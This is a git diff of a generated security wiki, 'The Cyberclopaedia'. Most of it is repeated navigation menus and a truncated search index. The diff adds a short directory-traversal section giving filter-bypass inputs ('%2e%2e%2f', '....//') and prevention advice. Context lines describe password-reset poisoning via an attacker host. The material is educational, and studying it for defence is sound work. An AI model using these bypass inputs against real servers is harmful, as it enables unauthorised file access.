        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

The Cyberclopaedia

- - diff --git a/docs/print.html b/docs/print.html index bd1094e3..a76e098b 100644 --- a/docs/print.html +++ b/docs/print.html @@ -101,7 +101,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -1916,6 +1916,18 @@

Filter Bypass

+

URL encoding can be used to bypass many filters which try to filter out the ../ sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the . character is %2e and the / character gets encoded to %2f. The whole sequence can therefore be represented as %2e%2e%2f.

+

Some filters try to strip out the ../ sequence before handling requests. Oftentimes, however, these filters are non-recursive and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence ....// will be changed to ../ after the middle ../ is removed.

+

Prevention

+

One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones.

+

After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. Ultimately, one should verify that this canonical path begins with the base directory.

+

Overview

HTTP Parameter Pollution describes the set of techniques used for manipulating how a server handles parameters in an HTTP request. This vulnerability may occur when duplicating or additional parameters are injected into an HTTP request and the website trusts them. Usually, HPP (HTTP Parameter Pollution) vulnerabilities depend on the way the server-side code handles parameters.

Server-Side HPP

@@ -1993,7 +2005,7 @@

When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request.

This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.

-

Prevention

+

Prevention

  1. Check to see if absolute URLs are necessary and cannot be replaced with relative ones.
  2. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header.
    3. @@ -9595,22 +9607,6 @@

    Native VLAN

    - - diff --git a/docs/searchindex.js b/docs/searchindex.js index 06d40f20..7a230db8 100644 --- a/docs/searchindex.js +++ b/docs/searchindex.js @@ -1 +1 @@ -Object.assign(window.search, {"doc_urls":["Cyberclopaedia/index.html","Cyberclopaedia/Contributing.html#overview","Cyberclopaedia/Contributing.html#in-scope","Cyberclopaedia/Contributing.html#out-of-scope","Cyberclopaedia/Contributing.html#structure","Cyberclopaedia/Contributing.html#naming","Cyberclopaedia/Contributing.html#folder-organisation","Cyberclopaedia/Contributing.html#page-structure","Cyberclopaedia/Contributing.html#toolchain","Cyberclopaedia/Contributing.html#licensing","Cyberclopaedia/License.html","Reconnaissance/index.html#introduction","Reconnaissance/Enumeration/index.html#overview","Reconnaissance/Enumeration/index.html#types-of-scanning","Reconnaissance/Enumeration/index.html#port-scanning","Reconnaissance/Enumeration/index.html#network-scanning","Reconnaissance/Enumeration/index.html#vulnerability-scanning","Reconnaissance/Enumeration/Port Scanning/index.html#introduction","Reconnaissance/Enumeration/Port Scanning/index.html#tcp-vs-udp","Reconnaissance/Enumeration/Port Scanning/index.html#port-states","Reconnaissance/Enumeration/Port Scanning/SYN Scan.html#syn-scan","Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html#tcp-connect-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#overview","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#null-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#fin-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#xmas-scan","Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html#obtaining-version-information","Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html#directory-brute-force","Reconnaissance/Enumeration/DNS Server Enumeration (53).html#enumerating-bind-servers-with-chaos","Reconnaissance/Enumeration/DNS Server Enumeration (53).html#dns-zone-transfer","Reconnaissance/Enumeration/FTP Enumeration (21).html#introduction","Reconnaissance/Enumeration/SNMP Enumeration (161).html#introduction","Reconnaissance/Enumeration/SNMP Enumeration (161).html#snmp-enumeration-using-snmp-check","Reconnaissance/Enumeration/SNMP Enumeration (161).html#snmp-enumeration-using-snmpwalk","Reconnaissance/Enumeration/SNMP Enumeration (161).html#bruteforce-community-strings-with-onesixtyone","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#introduction","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#sniffing-clear-text-credentials","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#credentials-validation","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#enumerating-the-database","Reconnaissance/OSINT/index.html#introduction","Reconnaissance/OSINT/Tools/index.html","Reconnaissance/OSINT/Tools/theHarvester.html#what-is-theharvester","Reconnaissance/OSINT/Tools/theHarvester.html#email-and-subdomain-harvesting","Reconnaissance/OSINT/Tools/recon-ng.html#what-is-recon-ng","Reconnaissance/OSINT/Tools/recon-ng.html#setup","Reconnaissance/OSINT/Tools/recon-ng.html#workflow","Reconnaissance/OSINT/Tools/recon-ng.html#modules","Reconnaissance/OSINT/Tools/recon-ng.html#profiler","Reconnaissance/OSINT/Domain Name Enumeration.html#using-whois-for-gathering-domain-name-and-ip-address-information","Reconnaissance/OSINT/Domain Name Enumeration.html#using-host-for-quick-lookups","Reconnaissance/OSINT/Domain Name Enumeration.html#querying-name-servers-with-dig","Reconnaissance/OSINT/Harvesting E-Mails.html#grabbing-e-mails-from-google-using-goog-mailpy","Reconnaissance/OSINT/Harvesting E-Mails.html#other-tools","Reconnaissance/OSINT/Instagram User Enumeration.html","Reconnaissance/OSINT/Whois Enumeration.html#introduction","Reconnaissance/OSINT/Whois Enumeration.html#whois-look-up","Reconnaissance/OSINT/Whois Enumeration.html#reverse-whois-lookup","Reconnaissance/OSINT/Google Dorks.html#introduction","Reconnaissance/OSINT/Google Dorks.html#common-operators","Exploitation/index.html#exploitation","Exploitation/Binary Exploitation/index.html#binary-exploitation","Exploitation/Binary Exploitation/Heap Exploitation/index.html#heap-exploitation","Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html#introduction","Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html#example","Exploitation/Binary Exploitation/Stack Exploitation/index.html#stack-exploitation","Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html#introduction","Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html#the-essence-of-a-format-string-vulnerability","Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html#leaking-memory","Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html#writing-arbitrary-memory","Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html#stack-canaries","Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html#bypassing-canaries","Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html#leaking-the-canary","Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html#bruteforcing-the-canary","Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html#introduction","Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html#theory","Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html#exploitation","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#introduction","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#gadgets","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#exploitation","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#exploiting-with-pwntools","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#pwntools-rop-commands","Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html#the-exploit","Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html#sigreturn-oriented-programming-srop","Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html#the-signal-frame","Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html#the-exploit","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#introduction","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#exploiting-a-buffer-overflow","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#using-de-brujin-sequences-to-identify-the-offset","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#finding-the-address-of-win","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#exploit","Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html#shellcode-attacks","Exploitation/Web/index.html#web","Exploitation/Web/SQL Injection/index.html#sql-injection","Exploitation/Web/SQL Injection/Finding SQLi.html#introduction","Exploitation/Web/SQL Injection/Defences.html#network-layer-defences","Exploitation/Web/SQL Injection/Defences.html#application-layer-defences","Exploitation/Web/SQL Injection/Defences.html#database-layer-defences","Exploitation/Web/SQL Injection/Introduction.html#overview","Exploitation/Web/SQL Injection/Introduction.html#types-of-sqli","Exploitation/Web/SQL Injection/Union injections.html#introduction","Exploitation/Web/SQL Injection/Union injections.html#determining-the-amount-of-columns-returned","Exploitation/Web/SQL Injection/Union injections.html#searching-for-columns-which-return-entries-of-a-particular-type","Exploitation/Web/SQL Injection/Cheatsheets.html#database-metadata","Exploitation/Web/SQL Injection/Cheatsheets.html#database-version","Exploitation/Web/SQL Injection/Cheatsheets.html#database-contents","Exploitation/Web/SQL Injection/Cheatsheets.html#string-concatenation","Exploitation/Web/SQL Injection/Cheatsheets.html#unconditional-time-delays","Exploitation/Web/SQL Injection/Cheatsheets.html#dns-lookups","Exploitation/Web/Template Injection.html#overview","Exploitation/Web/Template Injection.html#server-side-template-injection","Exploitation/Web/Template Injection.html#client-side-template-injection","Exploitation/Web/Open Redirect.html#overview","Exploitation/Web/Open Redirect.html#how-do-they-work","Exploitation/Web/Open Redirect.html#url-parameter-redirect","Exploitation/Web/Open Redirect.html#meta-refresh-tag-redirect","Exploitation/Web/Open Redirect.html#javascript-redirect","Exploitation/Web/PHP Object Injection.html#introduction","Exploitation/Web/PHP Object Injection.html#magic-methods","Exploitation/Web/PHP Object Injection.html#serialisation","Exploitation/Web/PHP Object Injection.html#deserialisation","Exploitation/Web/PHP Object Injection.html#prevention","Exploitation/Web/PHP Object Injection.html#phar-files","Exploitation/Web/PHP Object Injection.html#generating-the-payload","Exploitation/Web/PHP Object Injection.html#prevention-1","Exploitation/Web/HTTP Response Splitting.html#introduction","Exploitation/Web/CRLF Injection.html#overview","Exploitation/Web/Cross-Site Scripting (XSS).html#overview","Exploitation/Web/Cross-Site Scripting (XSS).html#stored-xss","Exploitation/Web/Cross-Site Scripting (XSS).html#blind-xss","Exploitation/Web/Cross-Site Scripting (XSS).html#reflected-xss","Exploitation/Web/Cross-Site Scripting (XSS).html#dom-based-xss","Exploitation/Web/Cross-Site Scripting (XSS).html#hunting-for-xss","Exploitation/Web/Cross-Site Request Forgery.html#overview","Exploitation/Web/Cross-Site Request Forgery.html#how-does-it-work","Exploitation/Web/Cross-Site Request Forgery.html#the-get-scenario","Exploitation/Web/Cross-Site Request Forgery.html#the-post-scenario","Exploitation/Web/Cross-Site Request Forgery.html#preventions","Exploitation/Web/Cross-Site Request Forgery.html#csrf-tokens","Exploitation/Web/Cross-Site Request Forgery.html#cors","Exploitation/Web/Cross-Site Request Forgery.html#origin-and-referer-headers","Exploitation/Web/Cross-Site Request Forgery.html#samesite-cookie-attribute","Exploitation/Web/WebSockets.html","Exploitation/Web/HTTP Parameter Pollution.html#overview","Exploitation/Web/HTTP Parameter Pollution.html#server-side-hpp","Exploitation/Web/HTTP Parameter Pollution.html#client-side-hpp","Exploitation/Web/Host Header Injection.html#introduction","Exploitation/Web/Host Header Injection.html#password-reset-poisoning","Exploitation/Web/Host Header Injection.html#prevention","Exploitation/Windows/index.html#windows","Exploitation/Windows/SCF File Attacks.html#introduction","Exploitation/Windows/SCF File Attacks.html#the-attack","Exploitation/DNS/index.html#dns","Exploitation/DNS/DNS Traffic Amplification.html#what-is-dns-traffic-amplification","Exploitation/DNS/DNS Traffic Amplification.html#how-does-it-work","Exploitation/DNS/DNS Traffic Amplification.html#conducting-a-dns-traffic-amplification-attack","Exploitation/DNS/DNS Traffic Amplification.html#testing-a-dns-server-for-attack-surface","Exploitation/DNS/DNS Traffic Amplification.html#executing-the-attack","Exploitation/DNS/DNS Cache Poisoning.html#introduction","Post Exploitation/index.html#post-exploitation","Post Exploitation/Privilege Escalation/index.html#introduction","Post Exploitation/Privilege Escalation/Linux/index.html#methodology","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#introduction","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#exploiting-misconfigured-common-binaries","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#privilege-escalation-via-shared-object-injection","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#privilege-escalation-via-path-hijacking","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#hijacking-relative-paths","Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html#hijacking-absolute-paths","Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html#introduction","Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html#exploiting-the-kernel","Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html#introduction","Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html#introduction","Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html#introduction","Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html#introduction","Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html#writing-the-malicious-library","Post Exploitation/Privilege Escalation/Windows/index.html#methodology","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html#introduction","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html#enumeration","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html#unquoted-service-paths","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html#weak-registry-permissions","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html#insecure-service-permissions","Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html#introduction","Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html#introduction","Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html#introduction","Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html#introduction","Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html#introduction","Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html#introduction","Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html#bypassing-uac","Post Exploitation/Privilege Escalation/Windows/Startup Applications.html#introduction","Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html#introduction","Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html#introduction","Post Exploitation/Enumeration/index.html","Post Exploitation/Enumeration/Linux/index.html#introduction","Post Exploitation/Enumeration/Linux/index.html#linux-enumeration-with-linpeas","Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html#finding-files-containing-passwords","Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html#finding-ssh-keys","Post Exploitation/Enumeration/Linux/System Enumeration.html#introduction","Post 